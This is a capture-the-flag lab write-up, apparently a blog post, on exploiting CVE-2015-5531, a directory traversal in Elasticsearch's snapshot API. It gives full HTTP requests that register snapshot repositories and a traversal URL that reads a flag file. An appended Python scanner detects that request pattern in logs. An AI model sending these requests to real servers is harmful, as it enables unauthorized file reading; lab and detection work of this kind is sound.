Chunqiu Yunjing CVE-2015-5531

张开发
2026/6/10 1:02:52 15-minute read
1. Read the range description

The description gives the approach directly: directory traversal, then access using ...

2. Start the range

You may need to wait a moment before the range comes up properly. The normal page is shown below.

3. PoC

Readers can also take my request as it is and change only the Host part. Here we start Burp Suite (bp) to capture traffic, then first construct this request:

    PUT /_snapshot/test HTTP/1.1
    Host: 8.147.132.32:40772
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Cookie: wp-settings-time-1=1762481244
    Upgrade-Insecure-Requests: 1
    Priority: u=0, i
    Content-Length: 114

    {
        "type": "fs",
        "settings": {
            "location": "/usr/share/elasticsearch/repo/test"
        }
    }

A 200 response means the request worked.

Then construct this request:

    PUT /_snapshot/tes2t HTTP/1.1
    Host: 8.147.132.32:40772
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Cookie: wp-settings-time-1=1762481244
    Upgrade-Insecure-Requests: 1
    Priority: u=0, i
    Content-Length: 132

    {
        "type": "fs",
        "settings": {
            "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
        }
    }

The result is as shown in the figure above.

Finally, access this URL:

    http://8.147.132.32:40772/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fflag

This result appears.

Then copy the numeric part and feed it to an AI. After a moment you get the flag we have been longing for, as shown below.

That concludes the article. Thank you for your valuable time.
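A defender-side check for the request pattern shown above, as an added example that is not part of the original post: it scans access logs for `_snapshot` requests whose repository or snapshot segment decodes to a path separator or `..`. The log format, sample lines and function names are constructed for illustration, and it assumes legitimate repository and snapshot names never contain path separators.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (assumed combined-log style); not from the post.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jun/2026:01:00:01 +0000] "PUT /_snapshot/test HTTP/1.1" 200 21
198.51.100.7 - - [10/Jun/2026:01:00:09 +0000] "GET /_snapshot/test/backdata%2f..%2f..%2fflag HTTP/1.1" 400 310
203.0.113.5 - - [10/Jun/2026:01:02:00 +0000] "GET /_snapshot/nightly/snap-2026.06.09 HTTP/1.1" 200 512
203.0.113.9 - - [10/Jun/2026:01:03:00 +0000] "GET /_snapshot/test/x%252f..%252fetc HTTP/1.1" 400 120
203.0.113.5 - - [10/Jun/2026:01:04:00 +0000] "GET /idx/_search?q=a%2f..%2fb HTTP/1.1" 200 90
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"([A-Z]+) (\S+) HTTP/[\d.]+"')


def fully_decode(segment, max_rounds=3):
    """Percent-decode repeatedly so double-encoded separators (%252f) are caught."""
    for _ in range(max_rounds):
        decoded = unquote(segment)
        if decoded == segment:
            break
        segment = decoded
    return segment


def is_snapshot_traversal(target):
    """True if a /_snapshot/ request hides a path separator or '..' in a name segment."""
    segments = target.split("?", 1)[0].split("/")
    if len(segments) < 3 or segments[1] != "_snapshot":
        return False
    for raw in segments[2:]:
        name = fully_decode(raw)
        # Assumption: real repository/snapshot names never contain separators.
        if "/" in name or "\\" in name or name == "..":
            return True
    return False


def find_suspicious(log_text):
    """Return (client_ip, method, target) for every flagged request line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_snapshot_traversal(m.group(3)):
            hits.append(m.groups())
    return hits


if __name__ == "__main__":
    for ip, method, target in find_suspicious(SAMPLE_LOG):
        print(ip, method, target)
```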
